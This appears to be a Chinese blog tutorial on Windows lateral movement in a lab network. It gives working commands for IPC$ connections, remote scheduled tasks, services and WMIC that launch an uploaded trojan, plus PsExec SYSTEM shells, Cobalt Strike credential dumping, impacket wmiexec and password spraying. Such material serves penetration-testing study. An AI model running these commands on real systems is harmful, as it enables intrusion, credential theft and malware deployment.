简单的内网横向移动

已于 2024-07-23 23:30:32 修改
阅读量1.2k 收藏 24
点赞数 33
文章标签: 网络 服务器 安全
于 2024-07-23 23:14:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74326506/article/details/140422765
版权

一.内网横向移动

在内网中,通过网站漏洞打进一台机器,进行存货扫描,扫到不同网段的机器,然后经过代理打进不同网段的机器,这种叫纵向移动,如果扫到同网段的机器,而且这台机器除了正常端口开放外,没有安装其他任何服务,这可以经过横向移动,打进这台同网段的机器

二.横向移动

1.密码喷洒

在通过一台机器的网站漏洞打进机器后,进行密码获取,获取到密码后,进行密码喷洒,在内网中,用户密码一样这件事情是经常存在的,所以可以利用已经获得的密码,对其他机器进行密码喷洒

2.ipc

ipc是共享命名管道的资源,是为了让进程之间进行通信的一种命名管道,只要提供连接的用户和口令,即可在双方之间建立安全的通道,利用ipc,连接者可以对目标主机实现目录的读取以及文件的上传等。

        a.利用条件

        目标开放139(netbios协议),445(文件和打印机共享)端口,手工利用需要都开启

        目标开启ipc$文件共享服务及默认共享

        目标管理员账号密码

        b.连接

        采用win7连接server08(只有administrator用户才可以建立net use连接)

net use \\192.168.8.130\ipc$ /user:administrator "wz1314521."  ————连接目标
net use  ————查看连接

67d4ce069df245869bd824e3df961798.png然后可以通过ipc$对目标进行上传木马,但是net use并不能执行文件,但是放到开机自启动是一种方法

ac2ce539cb2e443b8441706069dc7a86.png

查看server08 C盘,成功

edfe09ea3e0e432daabd1614c82bc909.png

2.ipc+计划任务

老版计划任务AT在server 2012以后已经被弃用所以需要使用schtasks

先通过ipc将木马传入目标机器,再给其创建计划任务

schtasks /create /s 192.168.8.133 /u administrator /p "wz1314521." /sc MINUTE /mo 1 /tn test /tr "c:\LOL.exe"

d31f528cb6f34e9e87933de075b5465a.png

创建成功,成功上线,删掉计划任务后,msf依旧不会掉线

cadcb9b301c6486a983d4642863b957b.png

schtasks /delete /tn test /s 192.168.8.133 /u administrator /p wz1314521.

9d955bceeebb4d8cb194ce0e75925374.png

3.ipc+sc

sc命令可以用来注册删除查询系统服务,如果创建一个服务与木马绑定,则可以实现上线,但是一会就掉线,因为要和服务管理器进行通信,若是异常,则终止服务,明显这个创建的服务并不是正常的服务,所以服务管理器则会终止服务。

sc \\192.168.8.133 create test binpath= "c:\LOL.exe" password= wz1314521. --创建test服务

sc \\192.168.8.133 start test --启动test服务

sc \\192.168.8.133 stop test  --停止服务

3fa47056eb164f2ca36caa4835683bb9.png

507a10b2b91d49a6b7cc3ec7c2286fea.png

4.WMIC

windows管理规范,允许一台计算机远程管理另一台计算机,要求开启135和445端口,weindows,默认开启而且自带WMIC,他不支持命令,而是支持执行文件,但是可以利用他执行cmd,再执行命令

wmic /node:192.168.8.133 /user:administrator /password:wz1314521. process call create "cmd.exe /c start C:\LOL.exe"

c7770a1715b14ee793b6f46a63a71b8e.png

064154a9f71b42beb73704054fc9c445.png

5.psexex

PsExec的基本原理:

  • 1. 通过ipc$连接,释放二进制文件psexecsvc.exe到目标

  • 2. 通过服务管理SCManager远程创建一个psexec服务,并启动服务

  • 3. 客户端连接执行命令,服务端通过服务启动相应的程序执行命令并回显数据

  • 4. 运行结束后删除服务

使用ms的psexec

win7先上线b61cf0820f4b4019844c70ec3c8ba061.png

使用模块psexec并配置

a666622948424a6c9d8d59fb8980cea3.png

使用之后,成功移动

70acb65662b44c7a9e36da98764d89bd.png

利用微软提供的psexec.exe

将下载好的psexec.exe传入win7

PsExec.exe -accepteula \\192.168.8.133 -u administrator -p wz1314521. -s cmd.exe

-accepteula:第一次运行psexec会弹出确认框,使用该参数就不会弹出确认框
-u:用户名
-p:密码
-s:以system权限运行运程进程,获得一个system权限的交互式shell。如果不使用该参数,会获得一个连接所用用户权限的shell

连接成功

dcab593a87f74e029a4d55263cd17155.png

6.cs

进入cs,创建两个监听,一个反向连接攻击机的监听,一个准备横向移动到win server 08的正向监听,上线win7后,用cs自己的存活扫描,扫描到win server 08,于是进行横向移动

win7上线后先hashdump和logonpasswords获取明文密码和hash

02cb1cf1d6df4bd391d4d036d95e8b86.png

155e44b8575842b3965c95361dcccc84.png

08724608bf264e41a0554f185ca8dd8a.png

23be3d46eb61435481a881ca601bcd78.png

成功

7.impacket的wmiexec

GitHub - maaaaz/impacket-examples-windows: The great impacket example scripts compiled for Windows

wmiexec.exe administrator:Liu78963@192.168.183.130
//wmiexec.py 用户名:密码@目标IP

5bca40764aba46e7af63b365d29e533d.png

.py同上述用法一样

 

 

 

 

 

拾荒家
关注
内网渗透-内网横向移动的九种方式
lza20001103的博客
08-26 1963
内网横向移动的九种方式 文章目录内网横向移动的九种方式实验环境1.IPC横向1.1 利用条件1.2 命令2.WMI横向2.1利用条件2.2wmic2.3 cscript2.4 wmiexec3.smb横向3.1 利用条件3.2 psexec(微软官方工具)3.3 psexec(impacket工具)3.4 smbexec4.密码喷洒4.1利用metasploit进行密码喷洒5.PTH-哈希传递5.1 利用条件5.2 MiMiKatz-PTH6.PTK-mimiKatZ761 利用条件7.PtT-票据传递(m
内网横向移动思路和技巧
热门推荐
11-30 2万+
攻击者借助跳板机进一步入侵内网服务器后,接着会通过各种方式来获取目标系统权限,获取用户的明文密码或Hash值在内网横向移动。最简单的方式,就是使用明文密码进行登录远程服务器。在这里,我...
内网安全横向移动(冰蝎&&msf&&IPC$)
hack0919的博客
04-21 937
冰蝎相较其它Webshell管理工具,具备如下优点:支持跨平台运行、多采用加密传输、版本更新频繁等。
内网横向移动常用方法
最新发布
qq_55894976的博客
08-23 1014
使用ms14-068生成新的票据。1.建立了ipc连接。
网络安全】企业内网中的横向移动
HBohan的博客
08-25 1553
横向移动,是攻击者侵入企业系统时,获取相关权限及重要数据的常见攻击手法。了解横向移动的原理有助于个人和企业更好地维护网络安全。 中安网星特此推出了横向移动科普系列,本系列共有三篇文章,我们会以简单轻松的话语为大家讲解横向移动的内容。 近年来,随着网络攻击、勒索事件频发,企业安全防护需求迅速上升,传统安全防护中以密码和权限管理为核心的单一防护模式愈发不能满足目前的网络安全环境。因而,深入了解攻击思路,“对症下药”,是目前网络安全行业发展的重要方向。 本篇文章将就“横向移动”这一典型攻击行为进行简单阐述,从攻击
内网渗透-内网环境下的横向移动总结
lza20001103的博客
04-14 1915
内网环境下的横向移动总结
横向移动
wei_43990108的博客
04-20 5268
横向移动 横向移动—APT Windows横向移动攻击的检测 https://www.4hou.com/technology/10430.html 概述 横向移动技术广泛应用于复杂的网络攻击中,特别是高级持续性威胁(APT)。攻击者使用这些技术访问受感染系统中的其他主机,并访问敏感资源(如邮箱,共享文件夹或凭证)。这些可以用于渗透其他机器、权限提升或者窃取更有价值的凭证。通过横向移动攻击最终可...
内网渗透-内网代理穿透和内网横向移动
lza20001103的博客
09-23 2444
内网代理穿透和内网横向移动 文章目录内网代理穿透和内网横向移动前言内网代理穿透nctermite(ew)ssh正向代理(A,B,C)msf设置路由和sock4代理访问内网流量内网横向移动后记 前言 进入内网后,我们就要扫描内网中有哪些主机了,重点是我们外网是无法访问内网的主机的,所在网段是不一样的,这时就需要我们设置代理和路由进行访问内网的流量了。上一期讲解了信息收集的相关内容,收集网段,补丁和域中成员以及域控的信息,对以下的横向移动至关重要,对后期的提权做好了准备。 内网代理穿透 首先,我们介绍几种代理工
内网渗透之横向移动
balalawb的博客
11-01 129
横向移动
内网渗透----横向移动
浅笑996的博客
05-31 1181
SMB WMI 使用wmic查询远程主机进程信息: wmic /node:192.168.91.131 /user:Administrator /password:ABCabc123 process list brief 创建进程: wmic /node:192.168.91.131 /user:Administrator /password:ABCabc123 process cal...
内网中的简单横向移动
Amire0x的小乐园
11-30 1692
横向移动 WMI 简介 全程Windows管理规范,从03开始一直存在 由一系列工具组成,可以在本地或者远程管理计算机系统 Windows默认不会讲WMI的操作记录在日志中 利用 条件 WMI服务开启,135端口,默认开启 防火墙允许135,445等端口通信 测试方法 nmap -p 135 ip telnet ip 135 ...... 管理员权限,及本地管理员组 wmic 用powershell联动cs wmic /node:<目标 ip> /user:<用户或域
安全科普】企业内网中的横向移动
小王的储物间
12-21 323
实际上,在横向移动攻击过程中,攻击者不仅可以运用相关技术与思路访问共享文件夹、凭证等敏感信息,也可以通过“横向移动”的方法渗透其它主机,窃取商业数据、财务信息等。除此以外,还能以域控主机为跳板,横向移动到其它域内主机,通过已获取的密码直接登录目标主机,执行远程命令,完成域内控制,进而以关键信息与权限为由,实施勒索行为。此时,黑客会在已控制的普通主机上查找与目标主机和环境相关的信息,获知目标主机开放的端口、存在的漏洞等,然后利用该漏洞渗透目标主机获取凭证,再使用哈希传递、黄金白银票据等方式进行登录。
内网横向移动常用方法总结
da_chuan_chuan的博客
04-27 4366
文章目录前言一、通过at&schtasks进行明文传递二、、atexec进行明文与HASH传递三、SMB 服务利用1、psexec工具传递2、smbexec工具传递四、WMI 服务利用1、wmic传递2、cscript传递3、wmiexec传递五、PTH横向传递攻击六、PTK横向传递攻击二、使用步骤1.引入库2.读入数据总结 前言 当我们拿下webshell后,若其服务器内网环境,在进一步测试中就需要进行内网渗透测试,对于内网渗透测试的方法常用的为:基于口令的横向移动和基于漏洞的攻击。本文主要从基
内网渗透测试:内网横向移动基础总结
zhangge3663的博客
10-27 4769
作者:WHOAMI,转载于freebuf。 横向移动内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境,控制域环境下的全部机器。 在这篇文章中,我们来 讲解一下横向移动的思路与攻击手法。 由于最近开学了有很多很多的事,所以一直没有时间更新,文章可能略显仓促,不足之处还请多多指教。 本文大多是我最近
内网横向移动——域渗透
Captain_RB的博客
09-08 2943
本文结合实践经验,详细介绍内网域渗透的基本思路和通用方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值